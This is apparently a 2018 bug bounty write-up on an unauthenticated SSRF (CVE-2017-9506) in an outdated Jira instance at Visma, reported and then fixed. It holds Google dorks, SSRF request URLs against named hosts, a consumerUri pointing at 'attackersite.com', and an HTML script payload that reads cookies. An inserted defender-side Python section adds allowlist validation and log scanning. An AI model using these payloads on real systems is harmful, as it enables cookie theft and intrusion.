How Outdated JIRA Instances Suffer from Multiple Security Vulnerabilities

Yeasir Arafat
Nov 3, 2018 · 2 min read

Hello friends. This is Yeasir Arafat again. In this article, I want to share what we can do if a site is running a third-party integration like Jira.

I was testing a public bug bounty program called Visma. As usual, I did the recon process to collect some of its subdomains. A few of them caught my attention because they were running Jira services. For example:

  1. https://jira.visma.lv/secure/Dashboard.jspa
  2. https://customer-incident.consulting.visma.com/secure/Dashboard.jspa

If you are specifically looking for Jira subdomains of your targets, you can use dorks like these:

inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login

[image: recon]

I noticed that the domain https://jira.visma.lv was running JIRA version 6.2.7. I remembered CVE-2017-9506, which affects Jira versions < 7.3.5. On those affected versions, we can perform an unauthenticated SSRF (CVE-2017-9506) through the OAuth icon-uri servlet:

https://site.com/jira/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com
https://site/confluence/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.com

Loading an external site through the unauthenticated SSRF on https://jira.visma.lv:

  1. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com

[image: Unauthenticated SSRF]

I tried to extract some data from internal assets or to get read access, but I was unable to do that. For exploitation, you can use a tool named `Jira-Scan`, available on GitHub.

You can create a simple HTML file that contains an XSS script. By pointing consumerUri=http://yoursite.com/xsshostedfile at that hosted file, you can trigger the XSS, because the servlet relays the fetched body and the browser renders it in the Jira origin.

<html>
<head><title>SSRF to XSS on Jira Vulnerable Instances</title></head>
<body>
<script>
alert(document.domain + " is vulnerable");
alert(document.cookie);
</script>
</body>
</html>

Turning the SSRF into XSS by hosting an HTML file also increases the severity of the vulnerability.

  2. https://jira.visma.lv/plugins/servlet/oauth/users/icon-uri?consumerUri=http://attackersite.com/ssrf.html

[image: SSRF to XSS]

I know that merely loading an external site is a P4-severity bug. Fortunately, I was able to turn this SSRF into XSS, so an attacker could now steal the victim's cookies.
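As an added, defender-side example (this is not code from the post, from Atlassian, or from the `Jira-Scan` tool), the Python script below shows the two checks a practitioner would want around the icon-uri servlet described above: an allowlist validation of consumerUri of the kind a fixed servlet could apply before fetching anything, a response-header policy that refuses to relay non-image bodies (which is what lets a hosted HTML file become XSS), and a scan of web access log lines that flags icon-uri requests whose consumerUri points outside the registered-consumer allowlist or at an internal address. The log lines, the allowed host `confluence.example.test` and the exact header policy are constructed assumptions for the example.

```python
"""Defender-side checks for the Jira oauth/users/icon-uri SSRF (added example, not Atlassian code)."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Servlet path from the vulnerable request shown in the post.
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"

# Apache/NGINX combined-style access log line (constructed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def host_is_internal(host):
    """True for loopback, private, link-local or reserved IP literals and for 'localhost'."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def validate_consumer_uri(uri, allowed_hosts):
    """Allowlist check a patched servlet could run on consumerUri before fetching it.

    Returns (ok, reason). Only http(s) URLs whose host is a registered OAuth
    consumer pass; internal addresses are rejected even if someone allowlisted them.
    """
    parts = urlsplit(uri)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "no host"
    if host_is_internal(host):
        return False, "internal address"
    if host not in allowed_hosts:
        return False, "host not a registered consumer"
    return True, "ok"


def icon_response_headers(upstream_content_type):
    """Headers to send when relaying a fetched icon (assumed policy, not Atlassian's fix).

    Refuses anything that is not an image and adds nosniff so the browser cannot
    reinterpret the body as HTML, which is what turned the SSRF into XSS above.
    """
    if not upstream_content_type.lower().startswith("image/"):
        return None  # do not relay HTML, scripts or anything else
    return {"Content-Type": upstream_content_type, "X-Content-Type-Options": "nosniff"}


def scan_access_log(lines, allowed_hosts):
    """Flag icon-uri requests whose consumerUri fails the allowlist check."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if target.path != ICON_URI_PATH:
            continue
        # parse_qs percent-decodes values, so encoded and plain consumerUri both work.
        for uri in parse_qs(target.query).get("consumerUri", []):
            ok, reason = validate_consumer_uri(uri, allowed_hosts)
            if not ok:
                findings.append({"src": m.group("ip"), "consumer_uri": uri,
                                 "reason": reason, "status": m.group("status")})
    return findings


# Constructed sample log lines (not from Visma or any real server).
SAMPLE_LOG = [
    '203.0.113.10 - - [03/Nov/2018:10:15:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com HTTP/1.1" 200 512',
    '203.0.113.10 - - [03/Nov/2018:10:15:07 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://127.0.0.1:8080/ HTTP/1.1" 200 98',
    '198.51.100.7 - - [03/Nov/2018:10:16:00 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fconfluence.example.test%2Ficon.png HTTP/1.1" 200 2048',
    '198.51.100.9 - - [03/Nov/2018:10:17:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 9000',
]
ALLOWED_CONSUMERS = {"confluence.example.test"}  # assumed registered OAuth consumer

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG, ALLOWED_CONSUMERS):
        print(finding)
```

Only the first two sample lines are reported: the google.com fetch (host not a registered consumer) and the loopback fetch (internal address); the third line targets the allowlisted consumer and the fourth is not an icon-uri request at all. The same `validate_consumer_uri` routine serves both as the detection predicate over logs and as the check a fixed servlet would apply before making the outbound request.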

[image: P4]

After I sent a clean report about this vulnerability to Visma, they fixed the issue within a few hours. They told me they would decommission the other subdomains that suffer from the same vulnerability.

Thanks! - Yeasir Arafat
